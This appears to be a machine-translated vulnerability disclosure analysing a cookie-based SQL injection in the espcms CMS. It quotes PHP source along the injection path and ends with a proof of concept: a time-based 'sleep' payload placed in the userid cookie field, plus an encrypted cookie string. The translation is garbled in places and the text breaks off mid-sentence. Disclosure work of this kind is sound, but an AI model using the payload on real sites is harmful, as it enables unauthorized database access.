An SQL injection vulnerability in Yisi espcms, with detailed analysis and POC code

$ Userid in file/interface/forummain. php is not filtered to enter SQL statement 17th to 32 rows

function in_list() {parent::start_pagetemplate();parent::member_purview(0, $this->mlink['orderlist']);include_once admin_ROOT . 'public/class_pagebotton.php';$lng = (admin_LNG == 'big5') ? $this->CON['is_lancode'] : admin_LNG;$page = $this->fun->accept('page', 'G');$page = isset($page) ? intval($page) : 1;$pagesylte = 1;$pagemax = intval($this->CON['bbs_max_list']);$userid = $this->ec_member_username_id;if (empty($userid)) {$this->callmessage($this->lng['db_err'], $_SERVER['HTTP_REFERER'], $this->lng['gobackurlbotton']);}$db_table = db_prefix . 'bbs';$db_where = " WHERE userid=$userid";$countnum = $this->db_numrows($db_table, $db_where);

Parent: member_purview defines how to get $ this-> ec_member_username_id in the/public/class_connector.php 415th line

function member_purview($userrank = false, $url = null, $upurl = false) {$this->ec_member_username = $this->fun->eccode($this->fun->accept('ecisp_member_username', 'C'), 'DECODE', db_pscode);$user_info = explode('|', $this->fun->eccode($this->fun->accept('ecisp_member_info', 'C'), 'DECODE', db_pscode));list($this->ec_member_username_id, $this->ec_member_alias, $this->ec_member_integral, $this->ec_member_mcid, $this->ec_member_email, $this->ec_member_lastip, $this->ec_member_ipadd, $this->ec_member_useragent, $this->ec_member_adminclassurl) = $user_info;

 

$ This-> fun-> accept ('ecisp _ member_username ', 'C') indicates obtaining the ecisp_member_username field in the cookie, $ this-> fun-> eccode ($ this-> fun-> accept ('ecisp _ member_info ', 'C'), 'decode', db_pscode) the ecode function in is in row 164th of the file \ public \ class_function.php. The key is a pre-defined drop, in the file \ datacahe \ public. php db_pscode = Authorization. Therefore, if $ userid is not processed after being decrypted from the cookie, it is assigned to $ db_where to enter the function $ this-> db_numrows. The function is defined in line \ public \ class_connector.php 293rd.

function db_numrows_ds($db_table, $db_where, $field) {$resulted = $this->db->query('SELECT COUNT(DISTINCT ' . $field . ') AS num FROM ' . $db_table . $db_where);$resulted = $this->db->fetch_assoc($resulted);return $resulted['num'];}

 

Follow up with $ this-> db-> query in line 55th of the file \ pulic \ class_dbmysql.php

function query($sql, $type = '', $cachetime = FALSE) { $func = $type == 'UNBUFFERED' && @function_exists('mysql_unbuffered_query') ? 'mysql_unbuffered_query' : 'mysql_query';if (!($query = $func($sql, $this->link)) && $type != 'SILENT') {if (!$this->netclass) {$this->halt('MySQL Query Error', $sql);

 

Finally, enter the mysql_query function to generate cookie injection.

After registering and posting a message, use the built-in encode function to decrypt the ecisp_member_info field of the cookie. The value is: 1 | 0 | 1 | test@test.com | 2130706433 | 2130706433 | e0b858f1249c7bbe85c69dcf5eaac720 | b8b9ba7f3baab2ada1655924178ceb4 to: 1 and sleep (9.999999) # | 0 | 1 | test@test.com | 2130706433 | 2130706433 | bytes | b8b9ba7f3baab2ada1655924178ceb4 encrypted: The ZFTCo5lRq6OdmqBanmKabJ-eb59fhq7eaLFksNWaqKV4q52opGDIo86vmJZplm2TaJZraK9mkmhlaGhtbGhjrspkw2ubnZyXaJdrxW-XlZmZaphncZubm2WXxpXEapiVsshuxWvEmWyZZ8OWlpNqmJyWYWiaaZplmZtvn27Gl8Rs executes the print execution of the SQL statement and runs: